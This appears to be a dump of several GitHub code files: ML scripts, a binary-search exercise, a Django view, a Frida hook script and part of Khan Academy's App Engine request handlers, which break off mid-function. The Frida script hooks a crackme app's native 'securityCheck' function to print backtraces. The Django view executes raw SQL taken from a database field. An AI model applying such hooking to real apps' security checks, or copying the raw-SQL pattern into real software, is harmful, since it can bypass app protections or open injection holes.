+{"seq_id":"165873909","text":"import numpy as np\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Dense, Input\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as plt\nimport csv\nfrom keras import backend as K\nimport keras\nfrom keras.models import load_model\nimport tensorflow as tf\n# def getSample(path):\n\t# label = []\n\t# input = []\n\t# with open(path, 'r', encoding='utf-8') as data:\n\t\t# read = csv.reader(data)\n\t\t# first_skip=True\n\t\t# for line in read:\n\t\t\t# if first_skip:\n\t\t\t\t# first_skip=False\n\t\t\t\t# continue\n\t\t\t# #one_hot=np.zeros(output_size)\n\t\t\t# #one_hot[int(line[0])]=1\n\t\t\t\n\t\t\t# label.append(int(line[0]))\n\t\t\t# raw = []\n\t\t\t# for i in line[1:]:\n\t\t\t\t# num=float(i)\n\t\t\t\t# if num>0:\n\t\t\t\t\t# raw.append(num)\n\t\t\t\t# else:\n\t\t\t\t\t# raw.append(0)\n\t\t\t# raw=np.array(raw)\n\t\t\t# raw=raw/np.average(raw)\n\t\t\t# input.append(raw)\n\t# return np.array(input),np.array(label)\n\n# x,y = getSample(\"sample_14L_Amptitute_0529.csv\")\n# # x,y = getSample(\"sample_mid.csv\")\n# print(np.shape(x), np.shape(y))\n\n\noutput_size=5 #類別數\ninput_size = 8192 #輸入Feature大小\nClassSampleNum = 240 #每個類別的樣本數\nTestSetNum = 40\nf_min = 150\nf_max = 70000\nResolution = 140000 / 16384\ndef getSample(path):\n\tlabel = []\n\tinput = []\n\twith open(path, 'r', encoding='utf-8') as data:\n\t\tread = csv.reader(data)\n\t\tfirst_skip=True\n\t\tfor line in read:\n\t\t\tif first_skip:\n\t\t\t\tfirst_skip=False\n\t\t\t\tcontinue\n\t\t\t#one_hot=np.zeros(output_size)\n\t\t\t#one_hot[int(line[0])]=1\n\t\t\t\n\t\t\tlabel.append(int(line[0]))\n\t\t\traw = []\n\t\t\tfor i in line[1::]:\n\t\t\t\tnum=float(i)\n\t\t\t\tif num>0:\n\t\t\t\t\traw.append(num)\n\t\t\t\telse:\n\t\t\t\t\traw.append(0)\n\t\t\traw=np.array(raw)\n\t\t\traw=raw/np.average(raw)\n\t\t\tinput.append(raw)\n\treturn np.array(input),np.array(label)\n\nx,y = getSample(\"sample.csv\")\nstd_x = np.std(x)\nmean_x = np.mean(x)\nx = (x-mean_x)/std_x\nprint(x.shape)\nprint(y.shape) \n\ndef Reorganize(x):\n x = np.reshape(x, (len(x), 8192))\n x_mean_col = np.mean(x , axis = 0)\n print(x_mean_col)\n x_mean = np.mean(x_mean_col[int((150/Resolution))::])*0.4\n print(x_mean)\n f = -Resolution\n flag = 0\n freq = []\n Idx = []\n #Select region\n print(\"Select region\")\n for i in range(input_size):\n f += Resolution\n if f > f_min and x_mean_col[i] > x_mean:\n if flag == 0:\n flag = 1\n freq.append([f])\n Idx.append([i])\n if f > f_min and x_mean_col[i] < x_mean:\n if flag == 1:\n flag = 0\n freq[len(freq)-1].append(f)\n Idx[len(Idx)-1].append(i)\n \n #merge\n print(\"merge\")\n j=0\n freq = np.array(freq)\n Idx = np.array(Idx)\n for i in range(len(freq)):\n if i == 0:\n continue\n if freq[j+1][0] - freq[j][1] < 300:\n freq[j][1] = freq[j+1][0]\n Idx[j][1] = Idx[j+1][0]\n freq = np.delete(freq, j+1, 0)\n Idx = np.delete(Idx, j+1, 0)\n else:\n j += 1\n \n #Reorganize\n print(\"Reorganize\")\n new_x = []\n for i in range(output_size*ClassSampleNum):\n new_x.append([])\n for idx in Idx:\n new_x[i].extend(x[i][idx[0]:idx[1]])\n \n # plt.plot(new_x[0][0:2369])\n # plt.title(\"Feature Map\")\n # plt.xlabel(\"Feature point\")\n # plt.ylabel(\"Amplitude\")\n # plt.show()\n \n new_x = np.reshape(new_x,(len(new_x), len(new_x[0])))\n print(np.shape(new_x))\n print(\"Freq. 
region : \")\n print(freq)\n print(Idx)\n \n # x_label = np.reshape(freq,(len(freq)*2))\n # y_label = np.ones(len(x_label))\n # plt.plot(np.arange(8191)*(Resolution)+Resolution, x_mean_col)\n # plt.bar(x_label,10,100, color='r')\n # plt.plot([0,70000], [x_mean, x_mean])\n # plt.xlabel(\"Frequency\")\n # plt.ylabel(\"Amplitude\")\n # plt.legend([\"Signal\", \"Threshold\", \"Select_Region\"])\n # plt.show()\n return new_x, len(new_x[0])\n \n# x, input_size = Reorganize(x)\n\ndef Greedy(evaluate_result, Model_num, sample_num, G_index = None, Threshold = None):\n TP=0\n TN=0\n FP=0\n FN=0\n\n if Threshold == None:\n sort_lose = np.sort(evaluate_result)\n Threshold = sort_lose[Model_num][G_index]\n \n for i,lose_ in enumerate(evaluate_result[Model_num]):\n if lose_ > Threshold: ##樣本lose大於當前閥值,即判定為不合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n FP += 1\n else:##實際為不合格\n TP += 1\n else: ##樣本lose小於當前閥值,即判定為合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n TN += 1\n else: #實際為不合格\n FN += 1\n TPR = TP/(FN+TP)\n FPR = FP/(FP+TN)\n PRE = TP/(TP+FP)\n ACC = (TP+TN)/(TP+TN+FP+FN)\n \n return TPR, FPR, PRE, ACC, TP, TN, FP, FN\n\npred_Data_test = []\npred_Data_train = []\nfor i in range(output_size*ClassSampleNum):\n if (i%ClassSampleNum >= ClassSampleNum-TestSetNum):\n pred_Data_test.append([x[i]])\n else:\n pred_Data_train.append([x[i]])\npred_Data_test = np.array(pred_Data_test)\npred_Data_train = np.array(pred_Data_train)\nprint(np.shape(pred_Data_test))\n\n##讀取所有模型\nclass_model = []\nfor i in range(output_size):\n class_model.append(load_model('./AE_Model/model_'+repr(i)+'/model_'+repr(i)+'.h5'))\n # class_model.append(tf.keras.models.load_model(\"model_\"+repr(i)+\".h5\"))\n \n##跑lose\nevaluate_result_test = []\nevaluate_result_train = []\nfor i in range(output_size):\n cc = []\n for j in range(output_size*TestSetNum):\n cc.append(class_model[i].evaluate(pred_Data_test[j],pred_Data_test[j])) ## test set\n evaluate_result_test.append(cc)\n \n cc = []\n for j in range((ClassSampleNum-TestSetNum)*output_size):\n cc.append(class_model[i].evaluate(pred_Data_train[j],pred_Data_train[j])) ## train set\n evaluate_result_train.append(cc)\nprint(\"loss :\", evaluate_result_train[0][0])","repo_name":"hello5949/PhoneLock","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39751273523","text":"import glob\nimport numpy as np\nimport os\nimport tqdm\n\n# Import params\nfrom params import *\n\n#############################################################\n# LOAD IMAGE DIRS AND WORD NUMBERS\n#############################################################\n\ndef load_image_dirs_and_word_numbers(trainValSpeakersList = [1, 2, 3, 4, 5, 6, 7, 9],\n valSplit = 0.1,\n siList = [10, 11]):\n # TRAIN AND VAL\n trainDirs = []\n trainWordNumbers = []\n valDirs = []\n valWordNumbers = []\n np.random.seed(29)\n\n # For each speaker\n for speaker in sorted(tqdm.tqdm(trainValSpeakersList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n # List of all videos for each speaker\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n totalNumOfImages = len(vidDirs)\n # To shuffle directories before splitting into train and validate\n fullListIdx = list(range(totalNumOfImages))\n np.random.shuffle(fullListIdx)\n # Append training directories\n for i in fullListIdx[:int((1 - valSplit) * totalNumOfImages)]:\n for j in range(wordsPerVideo):\n trainDirs.append(vidDirs[i])\n trainWordNumbers.append(j)\n # Append val directories\n for i in fullListIdx[int((1 - valSplit) * totalNumOfImages):]:\n for j in range(wordsPerVideo):\n valDirs.append(vidDirs[i])\n valWordNumbers.append(j)\n\n # Numbers\n print(\"No. of training words: \" + str(len(trainDirs)))\n print(\"No. of val words: \" + str(len(valDirs)))\n\n # SPEAKER INDEPENDENT\n siDirs = []\n siWordNumbers = []\n for speaker in sorted(tqdm.tqdm(siList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n for i in fullListIdx:\n for j in range(wordsPerVideo):\n siDirs.append(vidDirs[i])\n siWordNumbers.append(j)\n\n # Numbers\n print(\"No. of speaker-independent words: \" + str(len(siDirs)))\n\n # Return\n return trainDirs, trainWordNumbers, valDirs, valWordNumbers, siDirs, siWordNumbers\n","repo_name":"voletiv/GRIDcorpus-experiments","sub_path":"gen-images-and-words/load_image_dirs_and_word_numbers.py","file_name":"load_image_dirs_and_word_numbers.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"}
+{"seq_id":"2637201026","text":"#나무 자르기 (실버2) 231217 ✳ 4628ms ... 시간 너무 오래 걸림\ndef solution() :\n import sys\n input = sys.stdin.readline\n\n n, m = map(int, input().split()) #나무의 수, 상근이가 가질 나무의 길이\n tree_list = list(map(int, input().split())) #나무의 높이\n\n start = 0\n end = max(tree_list) #가장 긴 나무 높이\n\n while start <= end :\n mid = (start+end) // 2\n total = 0\n\n for tree in tree_list :\n #나무 높이가 절단기 높이보다 큰 경우\n if tree > mid :\n total += (tree - mid) #나무 자름\n\n #자른 나무들의 길이가 m 이상인 경우\n if total >= m :\n start = mid + 1\n #m보다 작은 경우\n else :\n end = mid - 1\n\n print(end)","repo_name":"eun417/replit_test","sub_path":"algorithm/BinarySearch/BAEKJOON/bj_31.py","file_name":"bj_31.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"13553495330","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views import View\n\nfrom baseapp.models.grafico import Grafico\n\n\nclass ListaGerarAjaxView(View):\n '''\n Adiciona um pedido via AJAX.\n :URl: http://ip_servidor/pedido/cadastrar/\n '''\n\n def get(self, request, **kwargs):\n '''\n :param request:\n :param id:\n :param kwargs: id do produto\n :return: HTML do modal\n '''\n context = {}\n data = {}\n data['form_is_valid'] = True\n data['id'] = self.kwargs.get('pk')\n data['titulo'] = 'chamados'\n data['tipo'] = 'bar'\n lista = get_object_or_404(Grafico, pk=self.kwargs.get('pk'))\n\n consulta = my_custom_sql(lista.sql)\n print(consulta)\n data['titulo'] = lista.nome\n lista = []\n for item in consulta:\n lista.append(item[0])\n data['lista'] = lista\n data['valor'] = lista\n\n return JsonResponse(data)\n\n\ndef my_custom_sql(consulta):\n from django.db import connection\n cursor = connection.cursor()\n cursor.execute(consulta)\n row = cursor.fetchall()\n return row\n","repo_name":"thiagolcdeoliveira/matrix","sub_path":"baseapp/views/ListaGerarAjax.py","file_name":"ListaGerarAjax.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"29691098542","text":"import sys\n\nimport frida\n\n\ndef on_message(message, data):\n if message['type'] == 'send':\n\n print(\" {0}\".format(message['payload']))\n else:\n print(message)\n\n\nthread_backtracer = \"\"\"\n//打印lib线程调用的堆栈,显示堆栈地址成功,map名字失败\nJava.perform(function(){\n\n var f = Module.findExportByName('libcrackme.so', 'Java_com_yaotong_crackme_MainActivity_securityCheck');\n \n Interceptor.attach(f, {\n onEnter: function(args){\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE))\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromaddress))\n }\n })\n \n\n\n\n});\n\n\n\"\"\"\n\nif __name__ == '__main__':\n process = frida.get_device_manager().enumerate_devices()[-1].attach(\n \"com.yaotong.crackme\")\n script = process.create_script(thread_backtracer)\n script.on('message', on_message)\n script.load()\n sys.stdin.read()\n","repo_name":"kylezb/useful","sub_path":"examples/useful_python/examples/frida_hook/frida_studuy.py","file_name":"frida_studuy.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"37615916628","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport urllib\nimport urlparse\nimport logging\nimport re\n\nfrom google.appengine.runtime.apiproxy_errors import CapabilityDisabledError\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n\nimport webapp2\n\nimport devpanel\nimport bulk_update.handler\nimport request_cache\nfrom gae_mini_profiler import profiler\nfrom gae_bingo.middleware import GAEBingoWSGIMiddleware\nimport autocomplete\nimport coaches\nimport knowledgemap\nimport consts\nimport youtube_sync\nimport warmup\nimport library\nimport homepage\nimport nl\nimport nl_report\n\nimport search\n\nimport request_handler\nfrom app import App\nimport util\nimport user_util\nimport exercise_statistics\nimport activity_summary\nimport exercises\nimport dashboard\nimport exercisestats.report\nimport exercisestats.report_json\nimport github\nimport paypal\nimport smarthistory\nimport goals.handlers\n\nimport models\nfrom models import UserData, Video, Playlist, VideoPlaylist, ExerciseVideo, UserVideo, VideoLog\nfrom discussion import comments, notification, qa, voting\nfrom about import blog, util_about\nfrom phantom_users import util_notify\nfrom badges import util_badges, custom_badges\nfrom mailing_lists import util_mailing_lists\nfrom profiles import util_profile\nfrom custom_exceptions import MissingVideoException\nfrom templatetags import user_points\nfrom oauth_provider import apps as oauth_apps\nfrom phantom_users.phantom_util import create_phantom, get_phantom_user_id_from_cookies\nfrom phantom_users.cloner import Clone\nfrom counters import user_counter\nfrom notifications import UserNotifier\nfrom nicknames import get_nickname_for\nfrom image_cache import ImageCache\nfrom api.auth.xsrf import ensure_xsrf_cookie\nimport redirects\nimport robots\nfrom gae_bingo.gae_bingo import bingo\n\nclass VideoDataTest(request_handler.RequestHandler):\n\n @user_util.developer_only\n def get(self):\n self.response.out.write('')\n videos = Video.all()\n for video in videos:\n self.response.out.write('
Title: ' + video.title)\n\n\nclass DeleteVideoPlaylists(request_handler.RequestHandler):\n# Deletes at most 200 Video-Playlist associations that are no longer live. Should be run every-now-and-then to make sure the table doesn't get too big\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(200)\n video_playlists_to_delete = []\n for video_playlist in all_video_playlists:\n if video_playlist.live_association != True:\n video_playlists_to_delete.append(video_playlist)\n db.delete(video_playlists_to_delete)\n\n\nclass KillLiveAssociations(request_handler.RequestHandler):\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(100000)\n for video_playlist in all_video_playlists:\n video_playlist.live_association = False\n db.put(all_video_playlists)\n\ndef get_mangled_playlist_name(playlist_name):\n for char in \" :()\":\n playlist_name = playlist_name.replace(char, \"\")\n return playlist_name\n\nclass ViewVideo(request_handler.RequestHandler):\n\n @ensure_xsrf_cookie\n def get(self, readable_id=\"\"):\n\n # This method displays a video in the context of a particular playlist.\n # To do that we first need to find the appropriate playlist. If we aren't\n # given the playlist title in a query param, we need to find a playlist that\n # the video is a part of. That requires finding the video, given it readable_id\n # or, to support old URLs, it's youtube_id.\n video = None\n playlist = None\n video_id = self.request.get('v')\n playlist_title = self.request_string('playlist', default=\"\") or self.request_string('p', default=\"\")\n\n readable_id = urllib.unquote(readable_id)\n readable_id = re.sub('-+$', '', readable_id) # remove any trailing dashes (see issue 1140)\n\n # If either the readable_id or playlist title is missing,\n # redirect to the canonical URL that contains them\n redirect_to_canonical_url = False\n if video_id: # Support for old links\n query = Video.all()\n query.filter('youtube_id =', video_id)\n video = query.get()\n\n if not video:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n readable_id = video.readable_id\n playlist = video.first_playlist()\n\n if not playlist:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n redirect_to_canonical_url = True\n\n if playlist_title is not None and len(playlist_title) > 0:\n query = Playlist.all().filter('title =', playlist_title)\n key_id = 0\n for p in query:\n if p.key().id() > key_id and not p.youtube_id.endswith('_player'):\n playlist = p\n key_id = p.key().id()\n\n # If a playlist_title wasn't specified or the specified playlist wasn't found\n # use the first playlist for the requested video.\n if playlist is None:\n # Get video by readable_id just to get the first playlist for the video\n video = Video.get_for_readable_id(readable_id)\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n playlist = video.first_playlist()\n if not playlist:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n redirect_to_canonical_url = True\n\n exid = self.request_string('exid', default=None)\n\n if redirect_to_canonical_url:\n qs = {'playlist': playlist.title}\n if exid:\n qs['exid'] = exid\n\n urlpath = \"/video/%s\" % urllib.quote(readable_id)\n url = urlparse.urlunparse(('', '', urlpath, '', urllib.urlencode(qs), ''))\n self.redirect(url, True)\n return\n\n # If we got here, we have a readable_id and a 
playlist_title, so we can display\n # the playlist and the video in it that has the readable_id. Note that we don't\n # query the Video entities for one with the requested readable_id because in some\n # cases there are multiple Video objects in the datastore with the same readable_id\n # (e.g. there are 2 \"Order of Operations\" videos).\n\n videos = VideoPlaylist.get_cached_videos_for_playlist(playlist)\n previous_video = None\n next_video = None\n for v in videos:\n if v.readable_id == readable_id:\n v.selected = 'selected'\n video = v\n elif video is None:\n previous_video = v\n elif next_video is None:\n next_video = v\n\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n if App.offline_mode:\n video_path = \"/videos/\" + get_mangled_playlist_name(playlist_title) + \"/\" + video.readable_id + \".flv\"\n else:\n video_path = video.download_video_url()\n\n if video.description == video.title:\n video.description = None\n\n related_exercises = video.related_exercises()\n button_top_exercise = None\n if related_exercises:\n def ex_to_dict(exercise):\n return {\n 'name': exercise.display_name,\n 'url': exercise.relative_url,\n }\n button_top_exercise = ex_to_dict(related_exercises[0])\n\n user_video = UserVideo.get_for_video_and_user_data(video, UserData.current(), insert_if_missing=True)\n\n awarded_points = 0\n if user_video:\n awarded_points = user_video.points\n\n template_values = {\n 'playlist': playlist,\n 'video': video,\n 'videos': videos,\n 'video_path': video_path,\n 'video_points_base': consts.VIDEO_POINTS_BASE,\n 'button_top_exercise': button_top_exercise,\n 'related_exercises': [], # disabled for now\n 'previous_video': previous_video,\n 'next_video': next_video,\n 'selected_nav_link': 'watch',\n 'awarded_points': awarded_points,\n 'issue_labels': ('Component-Videos,Video-%s' % readable_id),\n 'author_profile': 'https://plus.google.com/103970106103092409324'\n }\n template_values = qa.add_template_values(template_values, self.request)\n\n bingo(['struggling_videos_landing',\n 'homepage_restructure_videos_landing'])\n self.render_jinja2_template('viewvideo.html', template_values)\n\nclass ReportIssue(request_handler.RequestHandler):\n\n def get(self):\n issue_type = self.request.get('type')\n self.write_response(issue_type, {'issue_labels': self.request.get('issue_labels'),})\n\n def write_response(self, issue_type, extra_template_values):\n user_agent = self.request.headers.get('User-Agent')\n if user_agent is None:\n user_agent = ''\n user_agent = user_agent.replace(',',';') # Commas delimit labels, so we don't want them\n template_values = {\n 'referer': self.request.headers.get('Referer'),\n 'user_agent': user_agent,\n }\n template_values.update(extra_template_values)\n page = 'reportissue_template.html'\n if issue_type == 'Defect':\n page = 'reportproblem.html'\n elif issue_type == 'Enhancement':\n page = 'makesuggestion.html'\n elif issue_type == 'New-Video':\n page = 'requestvideo.html'\n elif issue_type == 'Comment':\n page = 'makecomment.html'\n elif issue_type == 'Question':\n page = 'askquestion.html'\n\n self.render_jinja2_template(page, template_values)\n\nclass Crash(request_handler.RequestHandler):\n def get(self):\n if self.request_bool(\"capability_disabled\", default=False):\n raise CapabilityDisabledError(\"Simulate scheduled GAE downtime\")\n else:\n # Even Watson isn't perfect\n raise Exception(\"What is Toronto?\")\n\nclass ReadOnlyDowntime(request_handler.RequestHandler):\n def get(self):\n raise 
CapabilityDisabledError(\"App Engine maintenance period\")\n\n def post(self):\n return self.get()\n\nclass SendToLog(request_handler.RequestHandler):\n def post(self):\n message = self.request_string(\"message\", default=\"\")\n if message:\n logging.critical(\"Manually sent to log: %s\" % message)\n\nclass MobileFullSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(True)\n self.redirect(\"/\")\n\nclass MobileSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(False)\n self.redirect(\"/\")\n\nclass ViewFAQ(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/about/faq\", True)\n return\n\nclass ViewGetInvolved(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewContribute(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('contribute.html', {\"selected_nav_link\": \"contribute\"})\n\nclass ViewCredits(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('viewcredits.html', {\"selected_nav_link\": \"contribute\"})\n\nclass Donate(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewTOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('tos.html', {\"selected_nav_link\": \"tos\"})\n\nclass ViewAPITOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('api-tos.html', {\"selected_nav_link\": \"api-tos\"})\n\nclass ViewPrivacyPolicy(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('privacy-policy.html', {\"selected_nav_link\": \"privacy-policy\"})\n\nclass ViewDMCA(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('dmca.html', {\"selected_nav_link\": \"dmca\"})\n\nclass ViewSAT(request_handler.RequestHandler):\n\n def get(self):\n playlist_title = \"SAT Preparation\"\n query = Playlist.all()\n query.filter('title =', playlist_title)\n playlist = query.get()\n query = VideoPlaylist.all()\n query.filter('playlist =', playlist)\n query.filter('live_association = ', True) #need to change this to true once I'm done with all of my hacks\n query.order('video_position')\n playlist_videos = query.fetch(500)\n\n template_values = {\n 'videos': playlist_videos,\n }\n\n self.render_jinja2_template('sat.html', template_values)\n\nclass ViewGMAT(request_handler.RequestHandler):\n\n def get(self):\n problem_solving = VideoPlaylist.get_query_for_playlist_title(\"GMAT: Problem Solving\")\n data_sufficiency = VideoPlaylist.get_query_for_playlist_title(\"GMAT Data Sufficiency\")\n template_values = {\n 'data_sufficiency': data_sufficiency,\n 'problem_solving': problem_solving,\n }\n\n self.render_jinja2_template('gmat.html', template_values)\n\n\nclass RetargetFeedback(bulk_update.handler.UpdateKind):\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n return db.GqlQuery('select __key__ from Feedback')\n\n def use_transaction(self):\n return False\n\n def update(self, feedback):\n orig_video = feedback.video()\n\n if orig_video == None or type(orig_video).__name__ != \"Video\":\n return False\n readable_id = orig_video.readable_id\n query = Video.all()\n query.filter('readable_id =', readable_id)\n # The database currently contains multiple Video objects for a particular\n # video. Some are old. 
Some are due to a YouTube sync where the youtube urls\n # changed and our code was producing youtube_ids that ended with '_player'.\n # This hack gets the most recent valid Video object.\n key_id = 0\n for v in query:\n if v.key().id() > key_id and not v.youtube_id.endswith('_player'):\n video = v\n key_id = v.key().id()\n # End of hack\n if video is not None and video.key() != orig_video.key():\n logging.info(\"Retargeting Feedback %s from Video %s to Video %s\", feedback.key().id(), orig_video.key().id(), video.key().id())\n feedback.targets[0] = video.key()\n return True\n else:\n return False\n\nclass ChangeEmail(bulk_update.handler.UpdateKind):\n\n def get_email_params(self):\n old_email = self.request.get('old')\n new_email = self.request.get('new')\n prop = self.request.get('prop')\n if old_email is None or len(old_email) == 0:\n raise Exception(\"parameter 'old' is required\")\n if new_email is None or len(new_email) == 0:\n new_email = old_email\n if prop is None or len(prop) == 0:\n prop = \"user\"\n return (old_email, new_email, prop)\n\n def get(self):\n (old_email, new_email, prop) = self.get_email_params()\n if new_email == old_email:\n return bulk_update.handler.UpdateKind.get(self)\n self.response.out.write(\"To prevent a CSRF attack from changing email addresses, you initiate an email address change from the browser. \")\n self.response.out.write(\"Instead, run the following from remote_api_shell.py.
and then check the logs in the admin console\")\n\n\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n\n (old_email, new_email, prop) = self.get_email_params()\n # When a user's personal Google account is replaced by their transitioned Google Apps account with the same email,\n # the Google user ID changes and the new User object's are not considered equal to the old User object's with the same\n # email, so querying the datastore for entities referring to users with the same email return nothing. However an inequality\n # query will return the relevant entities.\n gt_user = users.User(old_email[:-1] + chr(ord(old_email[-1])-1) + chr(127))\n lt_user = users.User(old_email + chr(0))\n return db.GqlQuery(('select __key__ from %s where %s > :1 and %s < :2' % (kind, prop, prop)), gt_user, lt_user)\n\n def use_transaction(self):\n return False\n\n def update(self, entity):\n (old_email, new_email, prop) = self.get_email_params()\n if getattr(entity, prop).email() != old_email:\n # This should never occur, but just in case, don't change or reput the entity.\n return False\n setattr(entity, prop, users.User(new_email))\n return True\n\nclass Login(request_handler.RequestHandler):\n def get(self):\n return self.post()\n\n def post(self):\n cont = self.request_string('continue', default = \"/\")\n direct = self.request_bool('direct', default = False)\n\n openid_identifier = self.request.get('openid_identifier')\n if openid_identifier is not None and len(openid_identifier) > 0:\n if App.accepts_openid:\n self.redirect(users.create_login_url(cont, federated_identity = openid_identifier))\n return\n self.redirect(users.create_login_url(cont))\n return\n\n if App.facebook_app_secret is None:\n self.redirect(users.create_login_url(cont))\n return\n template_values = {\n 'continue': cont,\n 'direct': direct\n }\n self.render_jinja2_template('login.html', template_values)\n\nclass MobileOAuthLogin(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('login_mobile_oauth.html', {\n \"oauth_map_id\": self.request_string(\"oauth_map_id\", default=\"\"),\n \"anointed\": self.request_bool(\"an\", default=False),\n \"view\": self.request_string(\"view\", default=\"\")\n })\n\nclass PostLogin(request_handler.RequestHandler):\n def get(self):\n cont = self.request_string('continue', default = \"/\")\n\n # Immediately after login we make sure this user has a UserData entity\n user_data = UserData.current()\n if user_data:\n\n # Update email address if it has changed\n current_google_user = users.get_current_user()\n if current_google_user and current_google_user.email() != user_data.email:\n user_data.user_email = current_google_user.email()\n user_data.put()\n\n # Update nickname if it has changed\n current_nickname = get_nickname_for(user_data)\n if user_data.user_nickname != current_nickname:\n user_data.user_nickname = current_nickname\n user_data.put()\n\n # Set developer and moderator to True if user is admin\n if (not user_data.developer or not user_data.moderator) and users.is_current_user_admin():\n user_data.developer = True\n user_data.moderator = True\n user_data.put()\n\n # If user is brand new and has 0 points, migrate data\n phantom_id = get_phantom_user_id_from_cookies()\n if phantom_id:\n phantom_data = UserData.get_from_db_key_email(phantom_id)\n\n # First make sure user has 0 points and phantom user has some activity\n if user_data.points == 0 and phantom_data and phantom_data.points > 0:\n\n # Make sure 
user has no students\n if not user_data.has_students():\n\n # Clear all \"login\" notifications\n UserNotifier.clear_all(phantom_data)\n\n # Update phantom user_data to real user_data\n phantom_data.user_id = user_data.user_id\n phantom_data.current_user = user_data.current_user\n phantom_data.user_email = user_data.user_email\n phantom_data.user_nickname = user_data.user_nickname\n\n if phantom_data.put():\n # Phantom user was just transitioned to real user\n user_counter.add(1)\n user_data.delete()\n\n cont = \"/newaccount?continue=%s\" % cont\n else:\n\n # If nobody is logged in, clear any expired Facebook cookie that may be hanging around.\n self.delete_cookie(\"fbsr_\" + App.facebook_app_id)\n self.delete_cookie(\"fbs_\" + App.facebook_app_id)\n\n logging.critical(\"Missing UserData during PostLogin, with id: %s, cookies: (%s), google user: %s\" % (\n util.get_current_user_id(), os.environ.get('HTTP_COOKIE', ''), users.get_current_user()\n )\n )\n\n # Always delete phantom user cookies on login\n self.delete_cookie('ureg_id')\n\n self.redirect(cont)\n\nclass Logout(request_handler.RequestHandler):\n def get(self):\n self.delete_cookie('ureg_id')\n self.redirect(users.create_logout_url(self.request_string(\"continue\", default=\"/\")))\n\nclass Search(request_handler.RequestHandler):\n\n def get(self):\n query = self.request.get('page_search_query')\n template_values = {'page_search_query': query}\n query = query.strip()\n if len(query) < search.SEARCH_PHRASE_MIN_LENGTH:\n if len(query) > 0:\n template_values.update({\n 'query_too_short': search.SEARCH_PHRASE_MIN_LENGTH\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n return\n searched_phrases = []\n\n # Do an async query for all ExerciseVideos, since this may be slow\n exvids_query = ExerciseVideo.all()\n exvids_future = util.async_queries([exvids_query])\n\n # One full (non-partial) search, then sort by kind\n all_text_keys = Playlist.full_text_search(\n query, limit=50, kind=None,\n stemming=Playlist.INDEX_STEMMING,\n multi_word_literal=Playlist.INDEX_MULTI_WORD,\n searched_phrases_out=searched_phrases)\n\n\n # Quick title-only partial search\n playlist_partial_results = filter(\n lambda playlist_dict: query in playlist_dict[\"title\"].lower(),\n autocomplete.playlist_title_dicts())\n video_partial_results = filter(\n lambda video_dict: query in video_dict[\"title\"].lower(),\n autocomplete.video_title_dicts())\n\n # Combine results & do one big get!\n all_key_list = [str(key_and_title[0]) for key_and_title in all_text_keys]\n #all_key_list.extend([result[\"key\"] for result in playlist_partial_results])\n all_key_list.extend([result[\"key\"] for result in video_partial_results])\n all_key_list = list(set(all_key_list))\n all_entities = db.get(all_key_list)\n\n # Filter results by type\n playlists = []\n videos = []\n for entity in all_entities:\n if isinstance(entity, Playlist):\n playlists.append(entity)\n elif isinstance(entity, Video):\n videos.append(entity)\n elif entity is not None:\n logging.error(\"Unhandled kind in search results: \" +\n str(type(entity)))\n\n playlist_count = len(playlists)\n\n # Get playlists for videos not in matching playlists\n filtered_videos = []\n filtered_videos_by_key = {}\n for video in videos:\n if [(playlist.title in video.playlists) for playlist in playlists].count(True) == 0:\n 